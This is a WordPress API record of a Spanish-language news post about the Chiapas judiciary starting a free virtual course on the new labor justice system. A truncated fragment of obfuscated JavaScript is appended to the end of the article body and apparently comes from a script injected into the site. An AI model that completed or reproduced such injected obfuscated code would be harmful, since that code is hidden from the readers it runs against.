{"id":9793,"date":"2023-04-28T04:23:35","date_gmt":"2023-04-28T04:23:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9793"},"modified":"2023-04-28T04:23:36","modified_gmt":"2023-04-28T04:23:36","slug":"comienza-poder-judicial-curso-de-actualizacion-en-el-nuevo-sistema-de-justicia-laboral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9793","title":{"rendered":"Comienza Poder Judicial curso de Actualizaci\u00f3n en el Nuevo Sistema de Justicia Laboral"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"580\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230427-WA0047-1024x580.jpg\" alt=\"\" class=\"wp-image-9794\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230427-WA0047-1024x580.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230427-WA0047-300x170.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230427-WA0047-768x435.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230427-WA0047-1536x870.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230427-WA0047.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, desde la Comisi\u00f3n de Carrera Judicial, autoriz\u00f3 la realizaci\u00f3n del Curso de Actualizaci\u00f3n en el Nuevo Sistema de Justicia Laboral, en su modalidad virtual.<\/p>\n\n\n\n<p>En este contexto, a trav\u00e9s de la coordinaci\u00f3n del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, inici\u00f3 la primera sesi\u00f3n de dicho curso en una transmisi\u00f3n en vivo en las redes sociales, donde la directora general del Centro de Conciliaci\u00f3n Laboral del Estado de Chiapas, Sandra Edith Guti\u00e9rrez Ochoa, fue la encargada de disertar el primer tema denominado La Conciliaci\u00f3n Laboral.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, la ponente Guti\u00e9rrez Ochoa agradeci\u00f3 al Poder Judicial y al magistrado presidente Ramos P\u00e9rez, por la oportunidad que se le ha conferido al Centro de Conciliaci\u00f3n Laboral del Estado de Chiapas, para poder intervenir y compartir su experiencia en el Nuevo Sistema de Justicia Laboral.<\/p>\n\n\n\n<p>\u201cQuiero resaltar que es un tema muy importante, porque ha sido uno de los impulsos que ha dado nuestra entidad, a trav\u00e9s del Gobernador Constitucional Rutilio Escand\u00f3n Cadenas, ya que Chiapas fue el primero de los estados y punta de lanza en incursionar a este nuevo modelo de justicia laboral\u201d, comparti\u00f3 la directora Sandra Edith Guti\u00e9rrez.<\/p>\n\n\n\n<p>Cabe mencionar, que este curso totalmente gratuito se realizar\u00e1 en un total de cuatro sesiones, cada una con diferentes ponentes, quedando pendientes las tres restantes los d\u00edas 28 de abril, 02 y 08 de mayo, en un horario de 17:00 a 19:00 h, mediante el link de la p\u00e1gina oficial&nbsp;<a href=\"https:\/\/www.facebook.com\/PJE.Chiapas\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.facebook.com\/PJE.Chiapas<\/a>.&nbsp;<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social&nbsp;<\/p>\n\n\n\n<p>y Relaciones P\u00fablicas<\/p>\n\n\n\n<p>61 7 87 00 Ext. 8020\/8021&nbsp;f&nbsp;<\/p>\n\n\n\n<p>: \/poderjudicial.chiapas&nbsp;t&nbsp;<\/p>\n\n\n\n<p>: @PJE_Chiapas<\/p>\n<\/blockquote>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, desde la Comisi\u00f3n de Carrera Judicial, autoriz\u00f3 la realizaci\u00f3n del Curso de Actualizaci\u00f3n en el Nuevo Sistema de Justicia Laboral, en su modalidad virtual. En este contexto, a trav\u00e9s &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9794,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9793","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9793","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9793"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9793\/revisions"}],"predecessor-version":[{"id":9795,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9793\/revisions\/9795"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9794"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9793"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9793"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9793"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}